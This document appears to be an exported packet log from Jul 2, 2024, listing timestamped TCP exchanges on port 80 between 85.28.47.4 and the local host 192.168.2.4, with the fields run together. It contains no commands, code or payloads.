                                            Jul 2, 2024 08:26:27.015053988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015064955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015075922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015110016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015121937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015206099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015218973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015252113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015263081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015393019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015403986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015414000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015434027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015441895 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015445948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015461922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015475035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015486002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015497923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015507936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015521049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015522957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015522957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015543938 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015543938 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015552044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015585899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015588999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015645027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.015774012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015784025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.015820026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016055107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016524076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016535997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016568899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016578913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016693115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016705990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016716003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016726971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016732931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016736984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016746998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016748905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016760111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016766071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016772032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016788006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016797066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016799927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016809940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016838074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016839027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016850948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.016875029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.016896009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018048048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018095970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018106937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018117905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018145084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018155098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018172979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018184900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018208027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018224955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018244982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018280029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018347025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018358946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018369913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018388987 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018402100 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018409014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018491030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018501043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018512964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018529892 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018551111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018645048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018656015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018667936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018678904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018686056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018698931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018723965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018778086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018814087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018840075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018851995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018862963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.018876076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018892050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.018906116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019005060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019021988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019043922 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019057989 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019129992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019140959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019155025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019165993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019166946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019176960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019182920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019201040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019226074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019366980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019378901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019397020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019407034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019408941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019419909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019428968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019437075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019449949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019452095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019460917 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019475937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019493103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.019737959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.019817114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.098355055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.098423004 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.098499060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.098511934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.098545074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.098558903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.099139929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.099189043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.103857994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.103877068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.103910923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.103924036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104042053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104054928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104063034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104074001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104087114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104094982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104123116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104135990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104476929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104506969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104518890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104526997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104537010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104558945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104680061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104695082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104706049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104717016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104729891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104731083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104741096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104743004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104770899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104783058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104830980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104849100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.104876041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.104887009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105242014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105252028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105262995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105283976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105300903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105421066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105432987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105444908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105456114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105468988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105473995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105480909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105503082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105597019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105609894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105621099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105640888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105659008 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105752945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105765104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105775118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105786085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105798006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105807066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105811119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105817080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105822086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.105835915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.105865955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.106678963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106692076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106703043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106714010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106723070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106729031 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.106736898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106746912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.106748104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106760025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106770992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.106770992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106787920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.106810093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.106870890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106884003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106894970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106904984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106916904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.106921911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.106940031 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.106949091 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.107006073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.107045889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.107676029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.107687950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.107698917 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.107733965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.107753038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.107783079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.107794046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.107805014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.107816935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.107821941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.107831001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.107856035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.150688887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.157371998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336584091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336602926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336616039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336682081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336694002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336708069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336736917 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.336781025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.336855888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336879015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336890936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336901903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336906910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.336915016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336929083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.336952925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.336961985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.336967945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337213039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337224960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337255955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337294102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337419033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337430954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337450027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337460041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337461948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337471008 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337474108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337486029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337490082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337496996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.337502956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337522030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337548971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.337975025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338025093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338109970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338123083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338131905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338155031 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338176012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338299990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338311911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338323116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338347912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338359118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338360071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338371992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338377953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338387012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338387966 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338412046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338440895 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338480949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338493109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338504076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338512897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338517904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338529110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338531017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338540077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338545084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338552952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.338570118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.338587046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.339164019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339174986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339185953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339202881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339215040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339232922 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.339253902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.339273930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.339332104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339344025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339396000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.339519978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339531898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339538097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339543104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339549065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339560032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339570045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339581966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.339591026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.339612007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.339626074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340307951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340317965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340328932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340339899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340353012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340368032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340393066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340476036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340492964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340506077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340517044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340526104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340526104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340528965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340539932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340548992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340552092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340559006 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340563059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340574026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340595007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340637922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340655088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.340658903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340687990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340696096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.340696096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341341019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341355085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341366053 CEST806388085.28.47.4192.168.2.4
